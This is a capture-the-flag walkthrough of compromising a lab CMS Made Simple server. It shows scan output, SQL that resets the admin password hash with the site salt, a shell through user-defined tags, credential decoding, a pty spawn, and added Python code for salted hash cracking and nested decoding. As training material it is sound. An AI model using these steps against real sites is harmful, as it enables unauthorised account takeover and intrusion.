My cmsms

Target IP

IP: 192.168.1.106

Information

Nmap:

# Nmap 7.70 scan initiated Sat Jul 11 09:05:47 2020 as: nmap -v -A -p- -oN info.txt 192.168.1.106
Nmap scan report for 192.168.1.106
Host is up (0.00032s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 27:21:9e:b5:39:63:e9:1f:2c:b2:6b:d3:3a:5f:31:7b (RSA)
| 256 bf:90:8a:a5:d7:e5:de:89:e6:1a:36:a1:93:40:18:57 (ECDSA)
|_ 256 95:1f:32:95:78:08:50:45:cd:8c:7c:71:4a:d4:6c:1c (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-favicon: Unknown favicon MD5: 551E34ACF2930BF083670FA203420993
|_http-generator: CMS Made Simple - Copyright (C) 2004-2020. All rights reserved.
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Home - My CMS
3306/tcp open mysql?
.....
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
|_ HY000

Dirb:

---- Scanning URL: http://192.168.1.106/ ----
==> DIRECTORY: http://192.168.1.106/admin/
==> DIRECTORY: http://192.168.1.106/assets/
+ http://192.168.1.106/cgi-bin/ (CODE:403|SIZE:278)
==> DIRECTORY: http://192.168.1.106/doc/
+ http://192.168.1.106/index.php (CODE:200|SIZE:19422)
==> DIRECTORY: http://192.168.1.106/lib/
==> DIRECTORY: http://192.168.1.106/modules/
+ http://192.168.1.106/phpinfo.php (CODE:200|SIZE:90281)
+ http://192.168.1.106/phpmyadmin (CODE:401|SIZE:460)
+ http://192.168.1.106/server-status (CODE:403|SIZE:278)
==> DIRECTORY: http://192.168.1.106/tmp/
==> DIRECTORY: http://192.168.1.106/uploads/

---- Entering directory: http://192.168.1.106/admin/ ----
+ http://192.168.1.106/admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.1.106/admin/lang/
==> DIRECTORY: http://192.168.1.106/admin/plugins/
==> DIRECTORY: http://192.168.1.106/admin/templates/
==> DIRECTORY: http://192.168.1.106/admin/themes/

---- Entering directory: http://192.168.1.106/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.106/doc/ ----
+ http://192.168.1.106/doc/index.html (CODE:200|SIZE:24)
+ http://192.168.1.106/doc/robots.txt (CODE:200|SIZE:121)

---- Entering directory: http://192.168.1.106/lib/ ----
==> DIRECTORY: http://192.168.1.106/lib/assets/
==> DIRECTORY: http://192.168.1.106/lib/classes/
+ http://192.168.1.106/lib/index.html (CODE:200|SIZE:24)
==> DIRECTORY: http://192.168.1.106/lib/jquery/
==> DIRECTORY: http://192.168.1.106/lib/lang/
==> DIRECTORY: http://192.168.1.106/lib/phpmailer/
==> DIRECTORY: http://192.168.1.106/lib/plugins/
==> DIRECTORY: http://192.168.1.106/lib/smarty/
==> DIRECTORY: http://192.168.1.106/lib/tasks/

Nikto:

- Nikto v2.1.6/2.1.5
+ Target Host: 192.168.1.106
+ Target Port: 80
+ GET Cookie CMSSESSID2a2f83428536 created without the httponly flag
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ ROSODUEV Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ GET /phpinfo.php: Output from the phpinfo() function was found.
+ GET /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-5034: GET /admin/login.php?action=insert&username=test&password=test: phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify.
+ OSVDB-48: GET /doc/: The /doc/ directory is browsable. This may be /usr/doc.
+ OSVDB-3092: GET /lib/: This might be interesting...
+ OSVDB-3268: GET /tmp/: Directory indexing found.
+ OSVDB-3092: GET /tmp/: This might be interesting...
+ OSVDB-3233: GET /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3233: GET /icons/README: Apache default file found.
+ GET /admin/login.php: Admin login page/section found.
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ GET The site uses SSL and Expect-CT header is not present.

At this point the CMS looked like the latest version, with apparently no exploitable vulnerability, and I wondered whether, this being a CTF-style box, the version number had been deliberately changed; but I didn't go down that road. My initial thinking was that boxes where you start from the middleware (MySQL and the like) are rather rare, more so in real engagements. Still =.= once I tried it, I found a weak MySQL password.
Since it's a weak password, the administrator's password hash (MD5) can be rewritten to get into the back end.

Get admin login

After logging into MySQL with the weak password, I first set the administrator's hash directly to md5('123456'), but the login reported a wrong password. A quick look showed that, besides the single MD5, the password also has a "salt" mixed in:

update cms_users set password = 'e10adc3949ba59abbe56e057f20f883e' WHERE user_id = '1';

Then I changed it to the following, and could log in:

update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name = 'sitemask'),''),'123456'))) where username = 'admin';
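The UPDATE above works because CMS Made Simple stores `cms_users.password` as md5(sitemask + password), with `sitemask` a single site-wide value in `cms_siteprefs`, not a per-user salt. The following Python is an added example, not code from the original post or from the CMSMS project: it reproduces that hash, verifies a candidate against a stored digest, runs an offline wordlist check (the practical consequence of a site-wide salt is that one sitemask lets every user row be tested at one MD5 per guess), and builds the same UPDATE with the digest precomputed so it can be inspected before it is sent to MySQL. The sitemask value and wordlist in the usage section are constructed samples; the real sitemask is read with `SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name = 'sitemask';`.

```python
import hashlib
import hmac
import re
from typing import Iterable, Optional

# CMS Made Simple: cms_users.password = md5(sitemask . password), where sitemask is a
# site-wide preference in cms_siteprefs (the post's UPDATE uses the same CONCAT).
# A plain md5(password) therefore never matches, which is what the first attempt hit.


def cmsms_password_hash(sitemask: str, password: str) -> str:
    """Return the hex digest CMSMS expects in cms_users.password."""
    return hashlib.md5((sitemask + password).encode("utf-8")).hexdigest()


def verify_cmsms_password(stored_hash: str, sitemask: str, candidate: str) -> bool:
    """Constant-time comparison of a candidate password against a stored digest."""
    return hmac.compare_digest(stored_hash.lower(), cmsms_password_hash(sitemask, candidate))


def crack_cmsms_hash(stored_hash: str, sitemask: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary check. Because the salt is site-wide rather than per-user,
    a dump of cms_users plus the one sitemask row is enough to test every account
    against a wordlist with a single fast MD5 per candidate."""
    for word in wordlist:
        if verify_cmsms_password(stored_hash, sitemask, word):
            return word
    return None


_SAFE_USERNAME = re.compile(r"^[A-Za-z0-9_.-]+$")


def reset_statement(sitemask: str, new_password: str, username: str = "admin") -> str:
    """Build the post's UPDATE with the hash precomputed, so the value written can be
    checked before it reaches MySQL. The username is interpolated into SQL text, so it
    is restricted to a conservative character set; never pass untrusted input here."""
    if not _SAFE_USERNAME.match(username):
        raise ValueError("refusing to interpolate an unsafe username into SQL")
    digest = cmsms_password_hash(sitemask, new_password)
    return f"UPDATE cms_users SET password = '{digest}' WHERE username = '{username}';"


if __name__ == "__main__":
    # Constructed sample values (hypothetical sitemask and wordlist), not data from the VM.
    sample_mask = "e3a0b7"
    print(reset_statement(sample_mask, "123456"))
    stored = cmsms_password_hash(sample_mask, "admin")
    print(crack_cmsms_hash(stored, sample_mask, ["password", "123456", "admin"]))
```

With an empty sitemask the digest collapses to plain md5('123456'), i.e. the value the first UPDATE wrote; the hash only differs once `sitemask` is non-empty, which is why that attempt failed while the CONCAT version succeeded.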

Get Limited Shell

[This post is a set of notes =。= my VM's network ended up on a different subnet again and couldn't reach the OVA; I couldn't be bothered to fix it, so the screenshots below were taken elsewhere for the record.]
CMS Made Simple has vulnerabilities recorded in domestic (Chinese) databases too, but I saw a method from abroad of getting a shell through the back end's user-defined tags (a UDT body is PHP that the server executes, so an admin account is all it takes).
[screenshot]
Then visit http://192.168.1.3/index.php?page=user-defined-tags and get a shell as www-data.

ROOT

In the web root /var/www/html I found hidden files under /admin and /assets.
[screenshot]
These give a base64 string; decoding it yields a base32 string, and decoding that again gives a username and password.
[screenshot]
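The two-layer decoding above as an added Python example, not code from the original post: `peel()` strips nested text encodings layer by layer, trying base32 before base64 because the base32 alphabet (A-Z, 2-7) is a subset of base64's and would otherwise be misidentified, tolerating stripped padding, and stopping as soon as no decoder yields printable ASCII. It generalises the post's base64-then-base32 case to any order of base32/base64/hex layers. The `user:pass` string in the usage section is a constructed stand-in, not the VM's credentials; `wrap()` only exists to build that sample.

```python
import base64
from typing import Callable, List, Tuple

# Decoders tried in order. base32 goes first because its alphabet (A-Z, 2-7) is a strict
# subset of base64's, so a base32 string also "looks like" base64; the reverse is rare.
# Each decoder raises ValueError (binascii.Error is a subclass) on input it cannot handle.


def _b32(s: str) -> bytes:
    s = s.upper()                                        # base32 is case-insensitive here
    return base64.b32decode(s + "=" * (-len(s) % 8))     # tolerate stripped padding


def _b64(s: str) -> bytes:
    return base64.b64decode(s, validate=True)            # reject non-alphabet characters


def _hex(s: str) -> bytes:
    return bytes.fromhex(s)


DECODERS: List[Tuple[str, Callable[[str], bytes]]] = [
    ("base32", _b32),
    ("base64", _b64),
    ("hex", _hex),
]


def peel(blob: str, max_depth: int = 6) -> List[Tuple[str, str]]:
    """Strip nested text encodings until no decoder yields printable ASCII.
    Returns [(encoding, decoded_text), ...] from the outermost layer inward;
    an empty list means the input is already plaintext (or not a known encoding)."""
    steps: List[Tuple[str, str]] = []
    current = blob.strip()
    for _ in range(max_depth):
        for name, decode in DECODERS:
            try:
                text = decode(current).decode("ascii").strip()
            except ValueError:            # bad alphabet, bad padding, or non-ASCII bytes
                continue
            if not text or not text.isprintable():
                continue                  # decoded, but not to readable text: wrong layer
            steps.append((name, text))
            current = text
            break
        else:
            break                         # no decoder applied: reached the innermost text
    return steps


def wrap(plaintext: str) -> str:
    """Inverse of the chain in the post, base64(base32(plaintext)); used only to build
    a constructed sample for the demonstration."""
    return base64.b64encode(base64.b32encode(plaintext.encode())).decode()


if __name__ == "__main__":
    sample = wrap("user:pass")   # constructed stand-in, not the credentials from the VM
    for layer, text in peel(sample):
        print(f"{layer:7} -> {text}")
```

The printable-ASCII check is a heuristic: a layer that happens to decode to readable text under the wrong scheme would be accepted, so when the final output does not look like a credential, rerun `peel()` on the intermediate strings by hand.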
Switch to that user and get a pty shell:

su armour
python3 -c 'import pty;pty.spawn("/bin/bash")'
  • sudo privilege escalation
    [screenshot]